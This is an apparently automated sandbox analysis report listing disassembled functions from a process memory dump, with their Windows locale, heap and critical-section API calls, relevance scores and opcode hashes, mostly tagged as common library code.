                                                                                                                                                                                                                                                                      • Opcode ID: aaf1bc6d694fa94ec92f19a324b1897147a0f6528f834e3d56bcd17226159be2
                                                                                                                                                                                                                                                                      • Instruction ID: 5fe0281f6b33cffd3f77b57564d7bf213f16987f9dd3366112a2835cc53a5ba9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaf1bc6d694fa94ec92f19a324b1897147a0f6528f834e3d56bcd17226159be2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94F08B367003485FCB246F36EC85A7A7B99FF80778F04442CFA018B680D2B5AC42EB50
                                                                                                                                                                                                                                                                      Function 00FE7132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE1C9A: EnterCriticalSection.KERNEL32(-0100DE50,?,00FE3576,?,0100A078,0000000C,00FE3841,?), ref: 00FE1CA9
                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00FE7125,00000001,0100A1D8,0000000C,00FE7554,00000000), ref: 00FE716A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                      • Opcode ID: 55baed637f65a30ffe0a93a1ddf057c58d26ad1048abb9c8a7eae93bbffbe2d0
                                                                                                                                                                                                                                                                      • Instruction ID: 95cf4757132f46c4677de24d7643a0b7487bbe322c8fa7dc68ed515955dd46b0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55baed637f65a30ffe0a93a1ddf057c58d26ad1048abb9c8a7eae93bbffbe2d0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21F03772A44344DFE711EF99E846B9877E0FB48722F10496AF510EB290EB7A8900AB51
                                                                                                                                                                                                                                                                      Function 00FEE0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: GetLastError.KERNEL32(?,00000008,00FEAD4C), ref: 00FE57D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00FE5872
                                                                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00FEE01F,00000001,?,?,?,00FEE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FEE0FD
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                      • Opcode ID: 17782f561db00ba6ba0af72b238ad3d981a36b59e33300abb7c83dbdba06b8b3
                                                                                                                                                                                                                                                                      • Instruction ID: 3340ff305b58fed0051a7e871dac229efe21c86b7734c7af467ad83e1d052c5b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17782f561db00ba6ba0af72b238ad3d981a36b59e33300abb7c83dbdba06b8b3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F02B3A70034997CB04AF36EC4567ABF95EFC1B64F0A4059EB058B651C676D882E790
                                                                                                                                                                                                                                                                      Function 00FD23F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00FD00E2,00000000,00000000,00000004,00FCED14,00000000,00000004,00FCF127,00000000,00000000), ref: 00FD2410
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                      • Opcode ID: 664766ef386465015d81b46d52c5d78122846f5305af19d3f37911c7133a9be2
                                                                                                                                                                                                                                                                      • Instruction ID: 3f9beb60eb80562b71592df438de5c72fed9e67c058c93a05d97ea03809b9636
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 664766ef386465015d81b46d52c5d78122846f5305af19d3f37911c7133a9be2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5E06832A90104B6D741EBB89E0FFBA769EEB02319F540142ED02D01D2CAA1CA00F1A0
                                                                                                                                                                                                                                                                      Function 00FE76AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FE4E3F,?,20001004,00000000,00000002,?,?,00FE4441), ref: 00FE76E3
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                      • Opcode ID: e6fc5932d565b9bba3d1ca59ec7ecebb6fd0a4b650f1a438c6658c8827c10e8d
                                                                                                                                                                                                                                                                      • Instruction ID: 9e2a92cbc232b2e4267048564b578300e5ba09db22051d28c1ce58a92b57eb42
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6fc5932d565b9bba3d1ca59ec7ecebb6fd0a4b650f1a438c6658c8827c10e8d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E04F3250875DBBCF123F62DC08AAEBE2AEF44760F104020FD0565120CB758920FAD5
                                                                                                                                                                                                                                                                      Function 00FD353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00FD3077), ref: 00FD3544
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                      • Opcode ID: 37c51890ad46f6cd5f7f7d07532392d995e316d909c48304dd0f87cfc7de2346
                                                                                                                                                                                                                                                                      • Instruction ID: af8b235f6250bc6a60639653de5582a2c20ab1e36ffe51cd2c3370706d2543b0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37c51890ad46f6cd5f7f7d07532392d995e316d909c48304dd0f87cfc7de2346
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                      Function 00FB2310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: EnterCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CA3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C98: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,?,00FB23B6,0100E638,8F6E4A30,?,?,00FF3D6D,000000FF), ref: 00FD2CE0
                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00FB2365
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 325507722-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6a4d59f1f6fdf23300f80fd616764bc7931ffcc8bcbf4b8ea3b6fdcf40536912
                                                                                                                                                                                                                                                                      • Instruction ID: 762fce2288a1dcaa8caca45fb37eb7d07a593407b4143e9aee77b572fbb34a9d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a4d59f1f6fdf23300f80fd616764bc7931ffcc8bcbf4b8ea3b6fdcf40536912
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA21DEB1901604DFE362DF68FC05B88B7B0E7183A0F040A59E5A5B73C4DB3A5A049F52
                                                                                                                                                                                                                                                                      Function 00FE0A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                      • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                                                                      • Instruction ID: 546c3c9dca8a9ea253c24e9d0f4226ffc41f66df49c82b12378650a9dad7e2d3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B32AD34E0025ACFCF28CF9AC991ABEB7B5EF44314F244169D945A7305DB36AE46DB80
                                                                                                                                                                                                                                                                      Function 00FE92A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 72685e2966dcd025d347ac902c6aa1cd3bc3393f4434d98083e58df76a439278
                                                                                                                                                                                                                                                                      • Instruction ID: 42a87bb140e78eea3bbe9505ff2466bf9ecb9cd949f05d077de4436b399ded09
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72685e2966dcd025d347ac902c6aa1cd3bc3393f4434d98083e58df76a439278
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3321621D29F454DD7239635CC22339A24DAFB73D4F15D737F81AB5AAAEB68C4836100
                                                                                                                                                                                                                                                                      Function 00FDA915 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: e20835bd9350873dcd936b784dae98d9e835047040e7e6a2d4dde668152f0069
                                                                                                                                                                                                                                                                      • Instruction ID: eb1922a5c3001679ac4fcd5b2e9c3369d6149a8e9d964e6e0681ed71f5710edd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e20835bd9350873dcd936b784dae98d9e835047040e7e6a2d4dde668152f0069
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E19B70A006058FCB24CF68C590A6EB7B3FF49320B29465BD4569B391D735ED42EB1B
                                                                                                                                                                                                                                                                      Function 00FDA587 Relevance: .3, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 4353a6ba3405d53207578ed3754f5c87abfcc9a72c36e95c8131979582fc97f9
                                                                                                                                                                                                                                                                      • Instruction ID: de5929831b3b92523ce8a8ed20057baa66d893f5f1e44f483063b6f51155291d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4353a6ba3405d53207578ed3754f5c87abfcc9a72c36e95c8131979582fc97f9
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15C19B709006468FCB29CF28C49466EBBB3BB45320F2C461BD89697391C735ED46FB5A
                                                                                                                                                                                                                                                                      Function 00FED8D5 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3471368781-0
                                                                                                                                                                                                                                                                      • Opcode ID: a9dd40e42dfce0975ebc977aad02b75da7af12a3826aa53b754319efc62f3dda
                                                                                                                                                                                                                                                                      • Instruction ID: 9082f40d55c254b0e28b47afe3c9727ec617ac9194218e3320038536ff6b23e0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9dd40e42dfce0975ebc977aad02b75da7af12a3826aa53b754319efc62f3dda
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FB108759007818BDB38AF26CC92BB7B3A9EF44718F14456DE94386A81F779E941E700
                                                                                                                                                                                                                                                                      Function 00FDC2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                                                                      • Instruction ID: 152f0bfff9864eebfdae8eda2ae698db27fe0e44c652d36d04558285fe67ede1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5518272E0021AEFDF14CF99C941AEEBBB2EF89310F198059E905AB301C7349E50DB90
                                                                                                                                                                                                                                                                      Function 00FD4920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                      • Instruction ID: 8d6ba950da5060203e5dc1ad51ad5a2c955c352f83fca87f2a846220f33badeb
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 911108B7A0118243D604C62FC4F46BBF397EBC633572D436BD0918BB58D232B945B602
                                                                                                                                                                                                                                                                      Function 00FEAD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                                                                                                      • Instruction ID: dd7c907c8e94a01b282d020189ca7fdb6495609aaf6e016723efb581059e3c44
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EE08C72911278EBCB25DB9ACD0498AF3ECEB84B11B15049AF501D3500D274EE00E7D1
                                                                                                                                                                                                                                                                      Function 00FE2DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
